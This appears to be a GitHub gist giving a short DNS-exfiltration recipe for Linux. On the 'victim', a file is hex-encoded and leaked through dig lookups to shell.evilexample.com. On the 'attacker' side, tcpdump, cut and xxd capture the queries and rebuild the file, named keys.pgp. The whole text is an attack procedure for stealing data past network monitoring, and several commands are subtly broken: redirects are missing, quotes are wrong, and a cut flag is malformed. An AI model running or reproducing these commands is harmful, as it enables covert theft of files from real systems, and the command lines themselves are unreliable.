Created
June 27, 2014 16:42
-
-
Save sckalath/276ba532629e8bef1537 to your computer and use it in GitHub Desktop.
DNS transfer on Linux
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| On victim: | |
| 1. Hex encode the file to be transferred: | |
| xxd -p secret file.hex | |
| 2. Read in each line and do a DNS lookup: | |
| for b in 'cat file.hex'; do dig $b.shell.evilexample.com;done | |
| On attacker: | |
| 1. Capture DNS exfil packets | |
| tcpdump -w /tmp/dns -s0 port 53 and host system.example.com | |
| 2. Cut the exfilled hex from the DNS packet | |
| tcpdump -r dnsdemo -n | grep shell.evilexample.com | cut -f9 -d" " | cut -f1"." | uniq received.txt | |
| 3. Reverse the hex encoding | |
| xxd -r -p received.txt keys.pgp |
Sign up for free
to join this conversation on GitHub.
Already have an account?
Sign in to comment